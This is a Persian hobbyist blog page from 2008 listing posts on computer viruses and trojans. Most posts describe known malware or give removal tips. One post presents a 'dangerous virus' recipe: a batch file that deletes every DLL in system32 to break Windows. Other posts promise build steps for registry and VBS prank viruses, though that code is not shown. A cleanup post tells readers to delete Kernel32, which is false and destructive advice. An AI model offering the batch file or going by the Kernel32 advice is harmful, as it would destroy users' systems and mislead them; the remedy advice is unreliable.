تبليغاتX
کامپیوتر - آپلود سنتر - مقالات و.....

کامپیوتر - آپلود سنتر - مقالات و.....

کامپیوتر آنامیس

منوي كاربري

Make Here For Your HomePage    Email To Admin    Add to Favorites


با سلام به همه عزیزان
ممنون از حضورتون
با نظرات سازنده خود مرا یاری نمایید
دوستانی که مایل به تبادل لینک می باشند پس از لینک این وبلاگ از قسمت نظرات به من خبر دهند تا من نیز در اسرع وقت وبلاگ انها را لینک کنم در غیر این صورت شرمنده ام
امیدوارم اوقات خوبی در این وبلاگ داشته باشید

لوگوي ما

 

كد لينك به ما :

موزيک

لينك دوستان

سايت تخصصي آموزش ايرانيان
آموزش وبلاگنويسان
کامپیوتر آنامیس
فانوس عشق - فرزانه
کلبه دل تنگی های من - معصومه
گمشده من - دریا
احساسات ساعتی - نادیا
کاش می دونستی دوستت دارم - سعید
عشق نامحسوس - میترا و الهام
بهار پائیزی
دوباره دل هوای با تو بودن کرده - صفا
وفای عشق
قرو قاطی - عسل
حقوق و ثبت - محمد
عاشق تنها - زهرا
قلب شکسته - دریا
.:. سمیرا دات .:.
کوی دوست
عشق منی
هرچی بخوای هست
کلبه عشق - پریسا
کامپیوتر - هدیه
ویژوال بیسیک
ضد دختر
عشق ابدی( عکسها و مطالب جالب )
دوستاران شهریار - نسیم
بهترین و خفن ترین ترفندهای کامپیوتری - نیلوفر
((ضرب المثل کشورهای مختلف))
وبلاگ تخصصی کامپیوتر و اینترنت
رقص باران
یه سری حرف قشنگ
رایانه - تجارت الکترونیک - آموزش و دانلود
اس ام اس - بازی - برنامه - دانلود
*** دنیای خودرو *** فرشاد
بزرگترين مركز دانلود ايرانيان
عاشق کوچک - غزال
برنامه نویسی به زبان دلفی
پادشاه نرم افزار
بهترین قالب های وبلاگ و وبسایت
๑۩۞۩๑ اخبارIT و نرم افزار ๑۩۞۩๑
برنامه های به درد بخور
اجتماعی وسینمایی
کامپیوتر و فناوری نوین
خودمونی - مریم
ترفند خبر و اطلاعات کامپیوتر
آموزش زبان انگلیسی راهنمایی
اس ام اس
نکات بالا بردن بازدید وبلاگ
"گروه آموزش و دانلود کارآمد"
مافیای غروب غم(مافیای غرب)
بررسی فیلم و گیم های روز
آموزش و اینترنت مجانی ومقاله
شهر من عجب شیر

لينك هاي روزانه
بهترين قالب هاي وبلاگ
تمام کدهاي جاوا اسکريپت
لینکستان سایت سهیلستان
عکس کلیب اس ام اس
انجمن جنوبگان
آپلود سنتر رایگان عکس
آپلود عکس
سایت مرجع متخصصین ایرانی
وضعیت آب و هوای کل کشور
تلفن 118 کل کشور
سزمین تجارت
انجمن رایانت

ساعت و تاريخ

عجیب ترین ویروس های رایانه ای سال ( ویروس ها و تروجان ها )

ویروس موعظه گرکرم رایانه ایی USBToy.A با نفوذ به سیستم ها و در کنار فعالیت تخزیبی خود به تبلیغ دینی و ارشاد مذهبی کاربران میپردازد .به عنوان مثال نگام راه اندازی سیستم عامل آیه هایی از انجیل را برای کاربران نمایش میدهد و برای مردم جهان رستگاری آرزو میکند.ویروسی که اطالاعت زیادی را میگیرد تروژان Burglar.A علاوه بر سرقت رمزهای عبور و اطلاعات محرمانه دیگر مشخصات دقیق جغرافیایی اطلاعاتی و رایانه ایی کاربران مورد حمله خود را به آنها اطلاع داده و به منتشر کننده خود ارسال میکند.کد مخرب با آرزوهای بزرگکد مخرب ArmyMovment که به طور خاص در ترکیه مشهور شد با ارسال پی درپی پیام های غیر واقعی به کربران به زبان ترکی ادعا میکرد که دستمزد کارگران و کارکنان دولت در آینده تا سقف 50 درصد زیاد میشود.یک ژورنالیست تمام عیار کرم Rinbot.Bبازاتب گسترده ایی در رسانه های جهان داشت زیرا علاوه بر تخریب وسیع سیستم با نمایش یک مصاحبه تخیلی (ولی حرفه ایی)با خبر گزاری CNN از دلایل وانگیزه های خالق و منتشر کننده خود خبر میداد.سارق حرفه ایی با چشمان تیز بینهیچ نوع فایل داده یا اطلاعات حساس از چشمان تیز بین XPcspy در امان نیست .عبارات تایپ شده در صفحات وب _اطلاعات مربوط به پنجره های باز شده _ برنامه های اجرا شده _وب سایت های مرور شده _و حتی ایمیل های خوانده شده توسط کاربر تنها بخشی از مواردی است که این کد خطرناک سرقت میکند.ویروس شوخ طبعویروس Ketawa.A به جای اجرای عملکرد های تخریبی و ایجاد اختلال در فعالیت سیستم با زبان مالایایی به اریال لطیفه های پی درپی برای کاربر و تشویق به خندیدن میپردازد .رفتار مهربان و خشونت پنهانویروس Gronev.A که سراغ جستجو گران موسیقی در اینترنت میرود .برنامه media player رابه طور خودکار اجرا کرده و شروع به نواختن سمفونی زیبا و مشهور با عنوان Lagu میکند .در حالی که کاربر نگون بخت به قطعه دلنواز گوش میدهد رایانه وی به تدریج با تخریب و اختلال شدیدی مواجه میشود .آکتور های بزرگ سینماسینما همیشه طرفداران پرو پا قرص خود را دارد .طراحان منتشر کننده Harreneix.Aو Pirabbian با هدف قرار دادن دوست داران این هنر و ادعای دانلود رایگان فیلم های پرفروش کاربران رابه کلیک بر روی لینک های آلوده تحریک میکند .وراج وجسورارزو کنید که رایانه شما هیچ وقت توسط ویروس BotVoice.A بی رحم آلوده نشود دوم اینکه امیدوار باشید لااقل هنگام ورود ناگهانی این کد به رایانه بلند گوهای سیستم خاموش باشند وگرنه BotVoice.A حضور خود را با صدائی بلند به کاربر اعلام میکند و تا وقتی که کلیه فایل ها و داده های مهم سیستم را پاک کند جملات خود را پی درپی تکرار میکند


نوشته شده توسط یوسف در دوشنبه سوم تیر 1387

 لينك مطلب     

آموزش ساخت ویروس flicker ( ویروس ها و تروجان ها )


اصطلاح flicker به معنای چشمک زن است و هر گاه این ویروس روی کامپیوتر اجرا شود پس از اولین restart کاربر زمانی که دکمه ای از کیبرد را فشار دهد مانیتور چشمک زده و از پشت کیس صدای بوق شنیده میشود.
این ویروس از آن دسته ویروس هایی است که به کمک رجیستری کار می کند.
برای ساخت این ویروس کدی که در ادامه مطلب امده  را در notepad کپی کرده و با نام flicker.REG ذخیره کنید.


ادامه ي مطلب ...


نوشته شده توسط یوسف در یکشنبه بیست و ششم خرداد 1387

 لينك مطلب     

ويروسها و مشكلات آنها در اينترنت ( ویروس ها و تروجان ها )

ويروسهاي كامپيوتري شهرت زيادي در تلوزيون و روزنامه پيدا كرده اند بخصوص اكنون كه افراد زيادي از اينترنت استفاده مي كنند حتي تصور اينكه كل كامپيوتر شما در اثر بازديد از يك صفحه وب و يا باز كردن يك email بهم ريخته و كارهايتان از بين ربته غير قابل بخشش است.

 

ادامه ي مطلب ...


نوشته شده توسط یوسف در شنبه بیست و پنجم خرداد 1387

 لينك مطلب     

چک کردن سیستم از وجود ویروس به شکل آنلاین از طریق اینترنت ( ویروس ها و تروجان ها )

یکی از مشکلاتی که کاربران به ویژه کاربران ایرانی دارند استفاده از آنتی ویروس ها برای اسکن کردن سیستم خود از وجود ویروس است. مشکلاتی از قبیل حجم زیاد نرم افزارهای آنتی ویروس ، نیاز به کرک کردن برای استفاده کامل و ... . در این ترفند قصد داریم چندین سرویس آنلاین را به شما معرفی کنیم که با بهره گیری از آنها میتوانید بدون نیاز به نرم افزار آنتی ویروس خاصی ، سیستم خود را از طریق اینترنت و به شکلی کاملأ رایگان اسکن کنید.

برای استفاده از این سرویس ها ، کافی است به سایتهای زیر رفته و از قابلیتهای موجود استفاده کنید:


Symantec Security Check
McAfee FreeScan
Panda ActiveScan
Kaspersky lab
Bitdefender
RAV
Trend Micro
SYGATE
AuditMyPc
Shields UP!!
VIRUS SCANNERS ON-LINE
Free Antivirus Removal Tools
__________________


نوشته شده توسط یوسف در جمعه بیست و چهارم خرداد 1387

 لينك مطلب     

طرز ساخت یک ویروس خطرناک ( ویروس ها و تروجان ها )

این ویروس بسیار ساده ولی خطرناک است و باعث از کار افتادن ویندوز می شود .

یک فایل notpad باز کرده و سپس دستورهای زیر را در آن وارد کنید

:c

dir

cd windows

dir

cd system32

del *.dll

توجه : در انتهای هر سطر اینتر بزنید .

سپس فایل را باپسوند bat.* ذخیره کنید .

با اجرا شدن این فایل ویندوز از کار خواهد افتاد .


نوشته شده توسط یوسف در پنجشنبه شانزدهم خرداد 1387

 لينك مطلب     

کرم AutoRun-S ( ویروس ها و تروجان ها )

AutoRun-S یک کرم برای سیستم‌های ویندوزی است که از طریق ابزارهای قابل حذف و اضافه منتشر می‌شود .

این کرم می تواند به اینترنت متصل شود و از طریق HTTP با سرور راه  دور ارتباط برقرار کند .

AutoRun-S با اولین اجرا یک کپی از خود  را در مکان‌های زیر قرار می‌دهد  :

 

.....

ادامه ي مطلب ...


نوشته شده توسط یوسف در یکشنبه دوازدهم خرداد 1387

 لينك مطلب     

مبارزه با ویروس شبیه فولدر ویندوز ( ویروس ها و تروجان ها )

احتمالا تا به حال متوجه شديد كه بدون اينكه فايلي رو اجرا كرده باشيد سيستمون ويروسي ميشه!!! ممكنه علت اون برخي ويروس ها باشن كه آيكون آنها شبيه فولدر هاي ويندوزه!!! و شما وقتيد مثلا يه كولديسك رو باز مي كنيد و وارد شاخه هاي اون ميشيد سيستمون آلوده ميشه چون در واقع شما به جاي وارد شدن به شاخه ها، ويروس رو اجرا مي كنيد و ويروس شاخه هاي رو كه قبلا مخفي كرده نمايش ميده. به طور كلي الگوريتم اين ويروس هاي به اين ترتيبه يعني وقتي تو سيستم آلوده يه كولديسك وارد ميشه مياد تمام شاخه هاي موجود تو اون رو مخفي مي كنه و به نام همونا خودشو با آيكون فولدر ميريزه تا وقتي تو يه سيستم جديد كاربري خواست وارد فولدر هاي كولديسك بشه سيستمش آلوده بشه.
راهش خيلي سادس قبل از اينكه روي فولدري دابل كليك كنيد روش راست كليك كنيد و اگر گزينه Explore وجود داشت يعني اون يه شاخه سالم ويندوزه مي تونيد خيلي راحت روش دابل كليك كنيد
اما اگه گزينه اي مثل Run as وجود داشت يعني اون يه شاخه نيست بلكه يه ويروسه!!! و بايد هر چه سريعتر اون فايل رو بدون هيچ نگراني Delete نماييد.
در صورتي كه تو ويندوز تنظيم كنيد كه پسوند ها نمايش داده بشه خيلي راحت ميتونيد تشخيص بديد كه آيتم فولدره يا ويروس چون اگه فولدر باشه پسوند exe. نداره!!!
اين ترفند براي سيستم هايي كه هنوز آلوده نشدن كاربرد داره.


نوشته شده توسط یوسف در شنبه یازدهم خرداد 1387

 لينك مطلب     

از بین بردن ویروس کظم غیظ virus kazme gheyze ( ویروس ها و تروجان ها )


چون در تعدای از سایتهای ایرانی مشاهده کردم که به جای کمک به کسانی که مورد حمله این ویروس قرار گرفته اند فایلهایی راقرار داده اند که متأسفانه خود دارای ویروس میباشد سعی کردم در اینجا در مورد شناسائی و از بین بردن این ویروس کمک کنم.
امیدوارم که به جای نابود کردن همدیگر به یکدیگر کمک کنیم ..!!!!
راه حل
این ویروس یعنی کظم غیظ یا kazme_gheze را که ویروسی است که اطلاعات شما را به بیرون هدایت میکند و در این مورد شما را به سایت مشخصی هدایت میکند با توجه به اینکه symantec antivirus این ویروس را به نام win32.virut شناسائی میکند در این سایت به شما اعلام میکند که با آپدیت کردن آنتی ویروس این ویروس به راحتی از بین میرود. البته ابتدا باید system restore کامپیوتر خود را خاموش کنید تا فایل های آن کاملا پاک شود و گرنه ویروس دوباره باز میگردد.
اگر قصد دارید به صورت دستی این کار را انجام دهید . برای اینکه بتوانید رجیستری خود را از حالت بلوکه شده نجات دهید و به قسمت run که نشاندهنده برنامه های استار ت آپ میباشد دسترسی پیدا کنید باید یک فایل خیلی کوچک به نام UnHookExec را از سایت سیمانتک دانلود کنید آدرس صفحه سایت

كد:
http://www.symantec.com/security_res...14-0532-99پس از دانلود این فایل باید کامپیوتر را ریستارت کرده و وارد vga mode و یا safe mode شوید ( توضیح برای عزیزانی که نمی دانند پس از ریستارت باید کلید f8 را فشار دهید تا وارد قسمت انتخاب mode مورد نظر شوید) سپس بر روی فایل دانلود شده کلیک راست کنید و آن را نصب کنید. حال شما میتوانید به رجیستری دسترسی داشته باشید و ویروس مورد نظر را از استارت آپ حذف نمایید البته قسمت های دیگری از رجیستری نیز آلوده شده که با رجوع به سایت سیمانتک و جستجوی نام این ویروس میتوانید اطلاع لازم را کسب کنید .

كد:
http://www.symantec.com/security_res...&tabid=3راه حل دوم و ساده تر
آخرین نرم افزار مایکروسافت برای از بین بردن ویروس ها را دانلود کنید  حجم آن 8.2 مگابایت در لیست این نرم افزار ویروس win32/virut هم دیده میشود که برای از بین بردن این ویروس میتواند به شما کمک کند آدرس لینک صفحه :

كد:
http://www.microsoft.com/downloads/d...ang=enآدرس لینک مستقیم فایل :

كد:
http://download.microsoft.com/downlo...میدوارم که توانسته باشم کمکی کرده باشم
موفق و پیروز باشید.


نوشته شده توسط یوسف در دوشنبه ششم خرداد 1387

 لينك مطلب     

ویروسهای مبتنی بر ایمیل ( ویروس ها و تروجان ها )


● سیستمهای تحت تاثیر
تمامی سیستمهایی که یکی از نسخه های ویندوز میکروسافت بر روی آنها اجرا میشود.
● چکیده
چندین ویروس اینترنتی مبتنی بر ایمیل مشاهده شده است. کاربران لازم است نحوه مقابله با این نوع ویروسها و یا شناسایی آنها را بدانند.
● توضیحات

ادامه ي مطلب ...


نوشته شده توسط یوسف در سه شنبه بیست و چهارم اردیبهشت 1387

 لينك مطلب     

ويروسهاي بوت سكتور ( ویروس ها و تروجان ها )


با گذشت زمان همانطور كه ويروس نويسان ماهرتر و خبره تر شدند حقه هاي جديدتري ياد گرفتند يك حقه كه دانستن آن مهم است توانايي فراخواني ويروس در حافظه است به طوريكه تا زمانيكه كامپيوتر كار مي كند اين ويروس ها جولان مي دهند. كه اين خود باعث مي شود كه ويروسها خود را به بسيار راحتر تكثير كنند يك حقه ديگر آلوده ساختن Boot Sector  در فلاپي ديسك و هارد ديسك است. Boot Sector يك برنامة كوچك است و اولين قسمت از سيستم عامل است كه  توسط كامپيوتر فراخواني مي شود. Boot Sector شامل يك برنامه كوچك است كه براي كامپيوتر تعيين مي كند كه چگونه سيستم عامل را فراخواني كند. يك ويروس با قرار دادن كد خود در Boot Sector اجراي خود را گارانتي مي كند. بنابراين ويروس مي تواند به راحتي در كامپيوتر فراخواني شود بنابراين قادر است هر زمان كه كامپيوتر روشن مي شود شروع به كار كند. اين ويروسها به راحتي مي توانند بوت سكتور يك فلاپي ديسك را آلوده كنند و با انتقال آن بين كامپيوترهاي ديگر مانند آتش ناشي از انفجار منتشر  شوند.
اما امروزه اين ويروسها مانند گذشته يك كابوس نيستند. چون امروزه  گرافيك  يك عنصر جدا نشدني از نرم افزارها شده است و در نتيجه حجم آنها به شدت افزايش پيدا كرده است و به ندرت مي توانيد نرم افزاري را پيدا كنيد كه روي يك يا حتي چند فلاپي ديسك  جا شود. امروزه نرم افزار ها بيشتر روي CD بين كامپيوتر ها جابجا مي شوند و چون CD ها عموماً قابل رايت مجدد نيستند و اگر هم باشند بايد بوسيله نرم افزار انجام شود اين ويروسها و ديگر ويروسهاي قابل اجرا به راحتي نمي توانند بين كامپيوتر ها تكثير شوند. ولي هنوز اينترنت وجود دارد. پس هميشه خطر آلوده شدن وجود دارد.


نوشته شده توسط یوسف در سه شنبه بیست و چهارم اردیبهشت 1387

 لينك مطلب     

این کرمهای شرور! ( ویروس ها و تروجان ها )

كرمها اصولاً ويروس نيستند با اين وجود تفاوت بين آنها بسيار اندك است و معمولاً در اخبار روزمره آنها را با يكديگر اشتباه مي گيرند. ويروسها يك كامپيوتر منفرد را آلوده مي كنند و سعي نمي كنند به كامپيوتر ديگري راه پيدا كنند اما کرمها بسیار شرور ترند چرا که سعی میکنند به کامپیوترهای دیگر انتقال پیدا کنند. ( مثلاً با اشتراك گذاشتن فايلها بوسيله email يا بوسيله فلاپي ديسك ها). كرمها به شدت علاقه مندند كه فقط خود را در ميان يك شبكه گسترش دهند. آنها به طور خود كار خودشان را به كامپيوترهاي ديگر انتقال مي دهند به علت اينكه انتقال آنها بين كامپيوترها به طور خودكار انجام مي پذيرد سرعت گسترش آنها بسيار سريعتر از ويروسها است. اما همیشه ما زرنگ تر بوده ایم. در این ترفند قصد داریم راه هایی را به شما معرفی کنیم که میتوانید از ورود کرم ها به سیستم تان جلوگیری کنید.

 

بقیه در ادامه مطلب

ادامه ي مطلب ...


نوشته شده توسط یوسف در سه شنبه بیست و چهارم اردیبهشت 1387

 لينك مطلب     

مشكلي به نام Folder.htt و Desktop.ini ( ویروس ها و تروجان ها )

اگر شما به هر پوشه سر ميزنيد و هر دو يار جدا نشدني را ميبينيد چه بايد كرد؟
يه توضيح كوتاه:
ويندوز خود باعث اين فايل ها ميباشد كه اصطلاحا به اين ها شبه ويروس گفته ميشود .
اما وارد مرحله عمل ميشويم با اين كاري كه گفته خواهد شد براي ويندوز شما يك سري برنامه ها از كار خواهند افتاد مثل اينترنت شما اما
اگر ميخواهيد از شرشان رها شويد هيچ نترسيد اونم چاره داره .
براي اين كه براي شما ابتدا محرض بشه كه چنين چيزهاي بر روي سيستم شما موجود هستند ميبايست show all file را فعال كنيد چرا كه
اين فايل ها مخفي هستند با احتساب اينكه اين كار را بلد هستيد ميريم سراغ مرحله اول.
ابتدا Find كنيد فايل Kernel32 را سپس Delet كنيد اين فايل رانترسيد.
حالا به آدرس هاي زير رفته و اگر فايل هاي خاطي را ديديد امان ندهيد پاكش كنيد .
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunOnceEx
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServices
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServicesOnce

HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Runonce
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run

حالا Find كنيد اين با فايل هاي خاطي ذكر شده را پيدا شدن پس پاك كنيد بدون ترديد.
حالا براي اين كه دوباره پيداشون نشه بايد يا Norton AntiVirouse 2004 or Panda Titanium را نصب كنيد .
اما حالا ميمونه اصل كاري Kernel32 اين فايل را بعد از 2يا 3 روز بعد از CD Windows پيدا و كپي كنيد اگر پيدا نكرديد Windows را يك
بار Upgrade كنيد .
بعد از اين كارها Antiviruse را فعال كنيد تا اگر اين فايل ها را احتمالا رويت كرد Deletesh كنه براي هميشه .
زياد بود اما ارزش داره چون اين دو فايل سرعت سيستم را در هنگام Load ويندوز و كارايي ويندوز ميگيرند اين دو فايل حتي خودشان را
در هنكام Boot ويندوز Load ميكنند كه باعث كاهش سرعت خواهند شد .


نوشته شده توسط یوسف در شنبه بیست و یکم اردیبهشت 1387

 لينك مطلب     

از بین بردن ويروس Document ( ویروس ها و تروجان ها )


این ویروس از طریق Email و Floppy به کامپوتر ها نفوذ می کند.
يك فلاپي آلوده به اين ويرس حاوي فولدرها و فايل هاي زير می باشد:
فایل Document.exe و فولدر Document
به محض اجراي فايل Document.exe پوشه Document باز مي شود.
در شاخه Run درون رجيستري كليدي در مسير زير به نام LoadService ايجاد مي شود كه بدون مقداراست.
 
بقیه در ادامه مطلب

ادامه ي مطلب ...


نوشته شده توسط یوسف در جمعه بیستم اردیبهشت 1387

 لينك مطلب     

تروجان جديد Mitglieder ( ویروس ها و تروجان ها )

Mitglieder از طريق ايميل منتشر مي‌شود و غالباً داراي موضوع يا متني مانند و است. به اين ايميل يك فايل ضميمه شده است كه داراي نام‌هايي مانند Info_prices.zip ،Sms_text.zip ،Health_and_knowledge.zip ،Max.zip و Business.zip است.

به محض دريافت و اجراي اين فايل، يك برنامه اجرايي روي ويندوز اجرا مي‌شود و سعي مي‌كند با يك سري آدرس‌هاي اينترنتي تماس بگيرد. همچنين از ديگر نشانه‌هاي اين تروجان ساخت يك پوشه به نام /exefld در بخشWindows سيستم است. اين تروجان از طريق ترفندهاي اسپم و ارسال همگاني در حال منتشر شدن است و تا كنون هزاران كامپيوتر را آلوده كرده است.


نوشته شده توسط یوسف در شنبه چهاردهم اردیبهشت 1387

 لينك مطلب     

آشنايي با ويروس W32/Rbot-UU ( ویروس ها و تروجان ها )



نام :: W32/Rbot-UU
نام مستعار :: Backdoor.Win32.Rbot.gen و W32/Sdbot.worm.gen.j
طریقه پخش :: اشتراکات شبکه
سیستم عامل هدف :: ویندوز
شدت پخش ::

 

بقیه در ادامه مطلب

ادامه ي مطلب ...


نوشته شده توسط یوسف در پنجشنبه دوازدهم اردیبهشت 1387

 لينك مطلب     

آشنايي با ويروس W32/Agobot-PI ( ویروس ها و تروجان ها )


نام :: W32/Agobot-PI
نوع :: کرم
طریقه پخش :: اشتراکات شبکه
سیستم عامل هدف :: ویندوز
نام مستعار :: Backdoor.Win32.Agobot.jg

 

بقیه در ادامه مطلب

ادامه ي مطلب ...


نوشته شده توسط یوسف در پنجشنبه دوازدهم اردیبهشت 1387

 لينك مطلب     

معرفي سه كرم اينترنتي Mydoom.AE و Zar.A , Bropia.A ( ویروس ها و تروجان ها )


Bropia.A: شرکت آنتي ويروس پاندا اين كرم را در تاريخ 21 ژانويه شناسائي كرد. اين كرم از طريق مسنجر MSN منتشر مي شود و يا ورود به سيستم به دنبال يك برنامه كاربردي مثل " 'IMWindowClass " مي گردد اگر نمونه اي از اين برنامه روي سيستم پيدا كند با يكي از نامهاي Drunk_lol.pif Webcam_004.pif, sexy_bedroom.pif, naked_party.pif یا love_me.pif به آن نفوذ مي كند. اين كرم پس از نصب خود روي سيستم ، درفايلهاي سيستم دايركتوري به دنبال فايلهاي adaware.exe, VB6.exe, lexplore.exe و Win32.exe مي گردد. اگر اين فايلها را پيدا نكرد خودش يك فايل به همراه يك كپي از انواع مختلف Gaobot را ايجاد مي كند . اين كرم تعداد زيادي فايلهاي خالي روي سيستم دايركتوري ايجاد كرده و از فعاليت taskmgr.exe و cmd.exe جلوگيري مي كند. همچنين كليدهاي تركيبي CTRL+ALT+Del و كليد سمت راست ماوس را از كار مي اندازد. از آنجا كه اين كرم پس از نفوذش به سيستم پيغام خاصي به كاربر نمي دهد و هيچ مشخصه خاصي هم ندارد در صورتي كه كليدهاي تركيبي سيستم خوب كار نكرد و يا كليدهاي ماوس از كار افتاد بهتر است به پيشنهاد Panda Lab فورا با Free Active Scan در سايت http://www.pandasoftware.com سيستم خود را اسكن كرده و آنتي ويروس خود را به روز كنيد. Zar.A : پاندا تاريخ اولين ظهور اين كرم را 18 ژانويه مي داند. اين كرم از طريق ايميل و با موضوع مصيبت سونامي و درخواست كمك براي آسيب ديدگان اين حادثه، سيستم ها را آلوده مي كند. فايل ضميمه نامه هاي الكترونيكي آلوده به اين ويروس Tsunami.exe است كه به محض اجرا شدن، ويروس Zar.A را نصب و يك كپي از آنرا از طريق outlook سيستم به كليه آدرسهاي ذخيره شده در آن مي فرستد. Zar.A براي اطمينان از اجرا شدن بعد از هر بار روشن کردن كامپيوتر، سه فايل را ايجاد و در رجيستري ويندوز ثبت مي كند. اين كرم تلاش مي كند با استفاده از حفره امنيتي Dos به وب سايت هاي مختلف نفوذ كند. به گفته پاندا نامه هاي آلوده به اين ويروس با موضوع "Tsunami Donation! Please help" و پيغام Please help us with your donation and view the attachment below! We need you!" " مي باشد. Mydoom.ae : تاريخ اولين ظهور اين كرم اينترنتي توسط پاندا 15 ژانويه اعلام شده. اين كرم نيز از طريق ايميل و به شكلهاي مختلف و از طريق فايلهاي به اشتراك گذاشته شده شيوع پيدا مي كند. اين كرم پس از آلوده كردن سيستم عمليات زير را انجام مي دهد: 1- برنامه Notepad را باز كرده و يك نوشته نامفهوم را روي آن نمايش مي دهد. 2- با ايجاد تغييراتي در host file به كاربر اجازه دسترسي به سايت هاي شناخته شده آنتي ويروس را نمي دهد و راه سيستم را براي ورود ساير فايلهاي مخرب باز مي كند. 3- تا زمانيكه كار خود را به پايان نرسانده عملكرد بد افزارهاي ديگر را محدود مي كند. 4- تلاش مي كند از اينترنت فايلهاي مختلفي را download كند. به گفته مدير بخش فوريت هاي ويروسي كمپاني پاندا، لوئيس كرونز، از آنجا كه اين كرم به محض ورودش به سيستم يك برنامه notepad را باز مي كند، فورا مي توان آنرا شناسائي كرد و با به روز كردن آنتي ويروس جلوي فعاليتهاي مخرب آنرا گرفت.

 

منبع: www.pandasoftware.com ترجمه: مرجان دارابي


نوشته شده توسط یوسف در پنجشنبه دوازدهم اردیبهشت 1387

 لينك مطلب     

روش از بین بردن ویروس COPY.EXE یا Perlovga - Brontok ( ویروس ها و تروجان ها )

سلام
دوستان عزیز با توجه به انتشار ویروس جدید COPY.EXE و درد سرهائی که برای کاربران بوجود آمده است تصمیم گرفتم تا این تاپیک را ایجاد کنم.
امیدوارم مفید واقع شود.

چند ویروس جدیدا خیلی پخش شدن و مشکلات زیادی رو بوجود آوردن. که در واقع تلفیقی از چند ویروس و تروجان هستن. این نوع وبروس رو دو مشخصه داره که میشه از روی اون فهمید آیا سیستم ویروسی هست یا نه.

بقیه در ادامه مطلب

ادامه ي مطلب ...


نوشته شده توسط یوسف در چهارشنبه یازدهم اردیبهشت 1387

 لينك مطلب     

طرز ساخت ویروس ( ویروس ها و تروجان ها )

 می خوام طرز ساخت یه ویروس ساده و با حال را براتون  بگم که کلی بخندید

بريد متن زير را در Notepad كپي كنيد و بعد اين فايل نوشتاري Notepad را به اسم ramikoh.vbs در دسكتاپ كامپيوترتون ذخيره كنيد....

بقیه در ادامه مطلب

 

ادامه ي مطلب ...


نوشته شده توسط یوسف در چهارشنبه یازدهم اردیبهشت 1387

 لينك مطلب     

تروجان (اسب تراوا) در یک نگاه ( ویروس ها و تروجان ها )

ویژگیهای عمومی تروجان

اسب تروجان خود را به شکلی غیر از آنچه هست به تصویر می‌کشد. اسب تروجان خود را به سایر فایلها الصاق نمی‌کند و از خود کپی ایجاد نمی‌کند، بلکه موجب آسیب به سامانه رایانهای یا ایجاد حفره امنیتی در رایانه می‌گردد. اسب تروجان را برای انتقال باید شخص یا برنامه‌ای ارسال کند. اسب تروجان ممکن است با برنامه‌های جذاب تفریحی و خنده‌آور یا روشهای دیگری به سامانه‌های رایانه ای منتقل شود. پس تا شما آن را وارد سامانه نکنید، نمی تواند منتقل شود؛ یعنی مانند ویروسها خزنده نیستند.

ادامه ي مطلب ...


نوشته شده توسط یوسف در چهارشنبه یازدهم اردیبهشت 1387

 لينك مطلب     

كرم رايانه اي به نام Mydoom ( ویروس ها و تروجان ها )

در ساعت نه روز چهارشنبه 28 ژانويه 2004 مطابق با هشتم بهمن 1382 ، شرکت مايکروسافت بررسی لازم در خصوص گزارشات دريافتی مبنی بر شيوع يک کرم جديد با نام Mydoom و يا Novarg شناخته شده با نام Mydoom.B را آغاز نمود. بر اساس گزارشات دريافتی ، کرم فوق امکان دستيابی به برخی وب سايت ها نظير تعدادی از وب سايت های مايکروسافت را سلب می نمايد . کرم فوق ، تلاش می نمايد که گيرندگان نامه های الکترونيکی را گمراه و آنان را تشويق به باز نمودن پيامی نمايد که دارای يک فايل
 
بقیه در ادامه مطلب

ادامه ي مطلب ...


نوشته شده توسط یوسف در سه شنبه دهم اردیبهشت 1387

 لينك مطلب     

تروجان Bckdr-QKU ( ویروس ها و تروجان ها )


توضیحات :

Bckdr-QKU تروجانی برای سیستم های ویندوزی است .

این تروجان می تواند به اینترنت متصل شود و از طریق HTTP با سرور راه دور ارتباط برقرار کند .

همچنین Bckdr-QKU فایل های زیر را در سیستم آلوده ایجاد می کند :

بقیه در ادامه مطلب

ادامه ي مطلب ...


نوشته شده توسط یوسف در سه شنبه دهم اردیبهشت 1387

 لينك مطلب     

تروجان CashGrab-T ( ویروس ها و تروجان ها )


توضیحات :

CashGrab-T تروجانی برای سیستم های ویندوزی است .

تروجان فایل \xp2008.dat, را در سیستم آلوده ایجاد می کند . این فایل مانند خود CashGrab-T تشخیص داده می شود .

بقیه در ادامه مطلب

ادامه ي مطلب ...


نوشته شده توسط یوسف در سه شنبه دهم اردیبهشت 1387

 لينك مطلب     

تروجان Pushu-F ( ویروس ها و تروجان ها )


توضیحات :

Pushu-F یک تروجان برای سیستم های ویندوزی است .

این تروجان زمانی که برای اولین بار اجرا می شود فایل \drivers\runtime.sys را در سیستم آلوده ایجاد می کند . این فایل همچون Troj/Pushu-Gen تشخیص داده می شود .

بقیه در ادامه مطلب

ادامه ي مطلب ...


نوشته شده توسط یوسف در سه شنبه دهم اردیبهشت 1387

 لينك مطلب     

کرم Vora-A ( ویروس ها و تروجان ها )



توضیحات :

\svfhost.exe یک کرم برای سیستم های ویندوزی است .

این کرم با اولین اجرا یک کپی از خود را در \svfhost.exe قرار داده ، سپس فایل های زیر را ایجاد می کند :

بقیه در ادامه مطلب

ادامه ي مطلب ...


نوشته شده توسط یوسف در سه شنبه دهم اردیبهشت 1387

 لينك مطلب     

کرم Eriv-A ( ویروس ها و تروجان ها )



توضیحات :

Eriv-A کرمی برای سیستم های ویندوزی است .

این کرم با اولین اجرا یک کپی از خود را مسیر های زیر قرا می دهد :

بقیه در ادامه مطلب

ادامه ي مطلب ...


نوشته شده توسط یوسف در سه شنبه دهم اردیبهشت 1387

 لينك مطلب     

تروجان Inject-BX ( ویروس ها و تروجان ها )


توضیحات :

Inject-BX تروجانی برای سیستم های ویندوزی است .

بقیه در ادامه مطلب

ادامه ي مطلب ...


نوشته شده توسط یوسف در سه شنبه دهم اردیبهشت 1387

 لينك مطلب     

تروجان Agent-GMC ( ویروس ها و تروجان ها )



توضیحات :

Agent-GMC یک تروجان برای سیستم هیا ویندوزی است .

بقیه در ادامه مطلب

ادامه ي مطلب ...


نوشته شده توسط یوسف در سه شنبه دهم اردیبهشت 1387

 لينك مطلب     

کرم Autoit-F ( ویروس ها و تروجان ها )



